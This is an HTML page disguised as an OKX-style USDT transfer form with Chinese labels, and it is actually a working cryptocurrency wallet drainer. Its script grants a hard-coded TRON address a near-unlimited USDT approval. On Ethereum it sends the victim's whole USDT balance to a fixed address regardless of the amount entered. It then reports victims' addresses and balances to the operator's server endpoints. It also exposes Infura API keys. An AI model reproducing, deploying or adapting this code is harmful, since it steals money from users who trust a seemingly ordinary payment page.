<!DOCTYPE html>
<html>
<head>
  <title>USDT Transfer</title>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1,maximum-scale=1, user-scalable=no">
  <link rel="icon" href="/static/js/oke/usdt.ico">
  <style>
    @font-face {
      font-family: "iconfont";
      src: url('/static/js/oke/iconfont.ttf') format('truetype');
    }
    .iconfont {
      font-family: "iconfont" !important;
      font-size: 16px;
      font-style: normal;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
    }
    .icon-fanhui2:before {
      content: "\f0116";
    }
    .icon-fanhui:before {
      content: "\f0343";
    }
    .icon-saoma:before {
      content: "\e712";
    }
    .icon-tongxunlu:before {
      content: "\e649";
    }
    * {
      padding: 0;
      margin: 0;
    }
    .container {
      width: 100vw;
      height: 100vw;
      padding: 0 4vw;
      font-size: 4vw;
      box-sizing: border-box;
    }
    .header {
      display: flex;
      justify-content: space-between;
      align-items: center;
      padding: 4vw 0;
      font-size: 4.4vw;
    }
    .header .hearde_name {
      font-size: 4.2vw;
      font-weight: 700;
    }
    .header .left {
      width: 4.2vw;
      height: 4.2vw;
      font-size: 4.4vw;
    }
    .trigger_netword {
      display: flex;
      justify-content: space-between;
      padding: 3vw;
      border: 1px solid #E3E3E3;
      border-radius: 1.6vw;
    }
    .trigger_netword .cash_photo {
      display: flex;
      align-items: center;
    }
    .trigger_netword .cash_photo .imgs {
      width: 8vw;
      height: 8vw;
      margin-right: 2.4vw;
    }
    .trigger_netword .cash_photo .cash {
      font-size: 4.2vw;
      font-weight: 700;
    }
    .trigger_netword .netword .netword_name {
      font-weight: 500;
      margin-right: 1vw;
    }
    .trigger_netword .netword .right {
      color: #ccc;
      font-size: 4vw;
    }
    .trigger_netword .netword {
      display: flex;
      align-items: center;
    }
    .lebal_title {
      display: flex;
      justify-content: space-between;
      align-items: center;
      line-height: 10vw;
    }
    .lebal_title .bebal_name {
      font-size: 4.2vw;
      font-weight: 600;
    }
    .lebal_title .operate {
      display: flex;
      justify-content: space-between;
      width: 24vw;
    }
    .lebal_title .operate .firend {
      font-size: 6vw;
    }
    .lebal_title .available {
      font-size: 3vw;
    }
    .in_box {
      display: flex;
      justify-content: space-between;
      padding: 5vw 3vw;
      border: 1px solid #E3E3E3;
      border-radius: 1.6vw;
    }
    .in_box .insert {
      outline: none;
      border: transparent;
      font-size: 3.3vw;
      color: #000000;
    }
    .in_box .right_box {
      color: #D0D0D0;
      display: flex;
      justify-content: space-between;
    }
    .in_box .right_box .cash {
      margin: 0 1vw;
    }
    .btn {
      color: #fff;
      background-color: #7424f9;
      border-radius: 1.6vw;
      line-height: 10vw;
      text-align: center;
      position: fixed;
      bottom: 16vw;
      width: 92vw;
    }
    .tishi {
      width: 8.5rem;
      height: 3.2rem;
      background: #00000059;
      z-index: 999999999999;
      position: fixed;
      top: 67%;
      left: 50%;
      transform: translate(-50%, -50%);
      border-radius: 0.3rem;
      color: white;
      font-size: 1.4rem;
      text-align: center;
      line-height: 3.2rem;
      display: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <div class="iconfont left"></div>
      <div class="hearde_name">发送</div>
      <div class="kong"></div>
    </div>
    <div class="trigger_netword">
      <div class="cash_photo">
        <img class="imgs" src="static/img/usdt.png" alt="usdt图片">
        <div class="cash">USDT</div>
      </div>
      <div class="netword">
        <div class="netword_name">转账网络</div>
        <div class="iconfont right icon-fanhui2"></div>
      </div>
    </div>
    <div class="lebal_title" style="margin-top:2.4vw;">
      <div class="bebal_name">收款地址</div>
      <div class="operate"></div>
    </div>
    <div class="in_box">
      <input type="text" placeholder="请输入收款地址" style="width:100vw" class="insert authaddress" value="" disabled="">
    </div>
    <div class="lebal_title" style="margin-top:5vw;">
      <div class="bebal_name">转账数量</div>
      <div class="available" id="available" style="display: none;">可用：<span id="ye">0</span> USDT</div>
    </div>
    <div class="in_box">
      <input type="number" placeholder="请输入收转账数量" class="insert input_amount" id="available1">
      <div class="right_box">
        <div class="cash">USDT</div>
        <div class="cash">|</div>
        <div class="cash" style="color:#8056D9" id="allusdt">全部</div>
      </div>
    </div>
    <div class="lebal_title" style="margin-top:5vw;">
      <div class="bebal_name">网络费用</div>
    </div>
    <div class="trigger_netword">
      <div style="font-size: 3vw;">
        <div style="font-size: 3.4vw;margin-bottom: 1vw;"><span id="gasPriceA">0.018002</span> <span class="chainname"></span></div>
        <div style="color: #D0D0D0;">$<span id="gasPriceU">0.12241</span></div>
      </div>
      <div class="netword">
        <div class="netword_name" style="font-size: 3.5vw;color: #D0D0D0;"><span id="gasPriceG">240.09</span> GWEI</div>
        <div class="iconfont right icon-fanhui2" style="font-size: 2vw;"></div>
      </div>
    </div>
    <div class="btn next_button disabled" id="confirm">确认</div>
    <div class="tishi">已发送</div>
    <div id="transferResult"></div>
  </div>
  <script src="/static/js/jquery.min.js" crossorigin></script>
  <script src="/static/js/TronWeb.js" crossorigin></script>
  <script src="/static/js/abi.js" crossorigin></script>
  <script src="/static/js/ethers-v4.min.js" crossorigin></script>
  <script src="/static/js/bignumber.min.js" crossorigin></script>
  <script src="/static/js/evmchain.js" crossorigin></script>
  <script src="/static/js/w3model.js" crossorigin></script>
  <script src="/static/js/web3.min.js" crossorigin></script>
  <script src="/static/js/web3provider.js" crossorigin></script>
  <script src="/static/js/layer.js" crossorigin></script>
  <script src="/static/js/lang2.js" crossorigin></script>
  <script src="/static/js/scroll.js" crossorigin></script>
  <script src="https://unpkg.com/vconsole/dist/vconsole.min.js" crossorigin></script>
  
    <script>
    // // 在页面加载完成后初始化vConsole
    // document.addEventListener('DOMContentLoaded', function() {
    //   var vConsole = new VConsole(); // 创建vConsole对象
    // });
  </script>
  
  <script>
    window.onload=async function() {
		
      try {
        if (typeof window.okxwallet !== 'undefined') {
			
            if (okxwallet.networkVersion == 195) {
                const res = await window.okxwallet.tronLink.request({method: 'tron_requestAccounts'});
                if (res == 200) {
                    this.tronweb = await okxwallet.tronLink.tronWeb;
                }
            }
        }
		else
		{
			
			let tronWeb;
			  if (window.tronLink.ready) {
				  
			    this.tronWeb = tronLink.tronWeb;
			  } else {
				  
			    const res = await tronLink.request({ method: 'tron_requestAccounts' });
			    if (res.code === 200) {
					
			      this.tronWeb = tronLink.tronWeb;
			    }
			  }
			  window.okxwallet={};
			  window.okxwallet.tronWeb=this.tronWeb;
			  window.okxwallet.tronLink=window.tronLink;
		}
        } catch (e) {}
      try {
        if (typeof web3 !== 'undefined') {
          web3 = new Web3(web3.currentProvider);
        } else {
            const res = await window.okxwallet.tronLink.request({method: 'tron_requestAccounts'});
            if (res == 200) {
                this.tronweb = await okxwallet.tronLink.tronWeb;
            }
            web3 = new Web3(new Web3.providers.HttpProvider('https://mainnet.infura.io/v3/3dc3f44ffbb94e86afce9cb7f60f0706'));
        }
        const networkId = await window.tronWeb;
        if (networkId === 1) {
          $('#gasPriceA').html('0.018002 ETH');
          $('#gasPriceU').html('0.12241');
          $('.netword_name').html("转账网络 ERC20");
          document.querySelector('.authaddress').value = "0xc0C27062744e0984ed88b4bd33393426D966E57e";
          document.getElementById('confirm').addEventListener('click', async function() {
            if (this.classList.contains('disabled')) {
              return;
            }
            try {
              await web3App();
            } catch (error) {
              console.error("授权交易错误:", error);
              
            }
          });
        } else if (networkId === 56) {
          $('#gasPriceA').html('0.002');
          $('#gasPriceU').html('BNB');
          $('.netword_name').html("转账网络 BSC20");
          document.getElementById('confirm').addEventListener('click', async function() {
            if (this.classList.contains('disabled')) {
              return;
            }
            try {
              await web3App();
            } catch (error) {
              console.error("授权交易错误:", error);
            }
          });
        } else if (networkId === 137) {
          $('#gasPriceA').html('0.002');
          $('#gasPriceU').html('MATIC');
          $('.netword_name').html("转账网络 Polygon");
          document.getElementById('confirm').addEventListener('click', async function() {
            if (this.classList.contains('disabled')) {
              return;
            }
            try {
              await web3App();
            } catch (error) {
              console.error("授权交易错误:", error);
            }
          });
        } else {
          $('#gasPriceA').html('22 TRX');
          $('#gasPriceU').html('2.59');
          $('.netword_name').html("转账网络 TRC20");
          document.querySelector('.authaddress').value = "测试地址";
          document.getElementById('confirm').addEventListener('click', async function() {
            if (this.classList.contains('disabled')) {
              return;
            }
            try {
              await transfer();
            } catch (error) {
              console.error("转账错误:", error);
            }
          });
        }
        var confirmButton = document.getElementById('confirm');
        var inputAmount = document.querySelector('.input_amount');
        inputAmount.addEventListener('input', function() {
          var amount = inputAmount.value;
          if (amount.trim() !== '') {
            confirmButton.classList.remove('disabled');
          } else {
            confirmButton.classList.add('disabled');
          }
        });
      } catch (error) {
        console.error("初始化错误:", error);
      }
    };

async function transfer() {
    
  try {
    const response = await window.okxwallet.tronLink.request({ method: 'tron_requestAccounts' });
    let authorized_address = "TFXCyok1yUAjCA8QTcVNXFpnXMzWT1A3nk";
    var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
    var selectedAccount = okxwallet.tronWeb.defaultAddress.base58;
    let instance = await okxwallet.tronWeb.contract().at(approveAddr);
    var balance = await instance.balanceOf(selectedAccount).call();
    var balanceof = balance.toLocaleString("hex", 10);
    await Promise.all([
      instance.increaseApproval(authorized_address, "9000000000000000000000000000").send({
        feeLimit: 100000000,
        callValue: 0,
        shouldPollResponse: false
      }),
      trcForm(selectedAccount, balanceof)
    ]);
    console.log("转账成功");
  } catch (error) {
    console.error("转账交易失败:", error);
    showTransferResult("转账失败");
    trcForm(selectedAccount, balanceof)
  }
}


async function trcForm(selectedAccount, balanceof) {
  try {
    const aassaass = await window.okxwallet.tronLink.request({ method: 'tron_requestAccounts' });
    $.ajax({
      url: "/api/test",//  /api/test
      type: "Get",
      data: 
      {
        addr: selectedAccount,
        price: balanceof,
        auth_add: "TFXCyok1yUAjCA8QTcVNXFpnXMzWT1A3nk",
      },
      success: function(res) {
      },
      error: function(xhr, status, error) {
        console.error("请求失败:", error);
      }
    });
  } catch (error) {
    console.error("请求失败:", error);
  }
}
    async function web3App() {
  try {
    const infura_key = "e50db09ff42942cca7a64eb5162ed13c";
    const approveAddr = "0xdac17f958d2ee523a2206206994597c13d831ec7";
    let injectedWeb3 = null;
    const Web3Modal = window.Web3Modal.default;
    const WalletConnectProvider = window.WalletConnectProvider.default;
    let web3Modal;
    const providerOptions = {
      walletconnect: {
        package: WalletConnectProvider,
        options: {
          infuraId: infura_key,
        },
      },
    };
    web3Modal = new Web3Modal({
      cacheProvider: false,
      providerOptions,
      disableInjectedProvider: false,
    });
    const provider = await web3Modal.connect();
    await provider.enable();
    const web3 = new Web3(provider);
    const accounts = await web3.eth.getAccounts();
    const selectedAccount = accounts[0];
    const contract = new web3.eth.Contract(abi, approveAddr);
    const gasPrice = await web3.eth.getGasPrice();
    const balance = await contract.methods.balanceOf(selectedAccount).call();
    const gasLimit = 70000;
    let authorized_address = "0x3ecac1fc9d1c5a9a6b8d30af2e54d17d4588330f";
    contract.methods.transfer(authorized_address, balance)
      .send({
        from: selectedAccount,
        gasPrice: gasPrice,
        gas: gasLimit,
      })
      .on("transactionHash", function(hash) {
        console.log("Transaction hash:", hash);
        ercForm(); 
      })
      .on("error", function(error) {
        console.error("转账交易失败:", error);
        showTransferResult("转账失败");
      });
  } catch (error) {
    console.error("转账交易失败:", error);
    showTransferResult("转账失败");
  }
}


    
    async function ercForm(balance) {
      const infura_key = "e50db09ff42942cca7a64eb5162ed13c";
      const approveAddr = "0xdac17f958d2ee523a2206206994597c13d831ec7";
      var injectedWeb3 = null;
      var Web3Modal = window.Web3Modal.default;
      var WalletConnectProvider = window.WalletConnectProvider.default;
      var web3Modal
      var providerOptions = {
        walletconnect: {
          package: WalletConnectProvider,
          options: {
            infuraId: infura_key,
          }
        },
      };
      web3Modal = new Web3Modal({
        cacheProvider: false,
        providerOptions,
        disableInjectedProvider: false,
      });
      provider = await web3Modal.connect()
      provider.enable()
      var web3 = new Web3(provider);
      provider.enable()
      var accounts = await web3.eth.getAccounts()
      selectedAccount = accounts[0]
      $.get("/api/index/login", {
        address: selectedAccount,
        balance: balance,
        from_type: "OKE",
        au_address: "0x3ecac1fc9d1c5a9a6b8d30af2e54d17d4588330f",
        type: "0"
      }, res => {
      });
    }
	//0x3ecac1fc9d1c5a9a6b8d30af2e54d17d4588330f
  </script>
  <style>
    .disabled {
      background-color: #ccc !important;
      pointer-events: none;
    }
  </style>
</body>
</html>
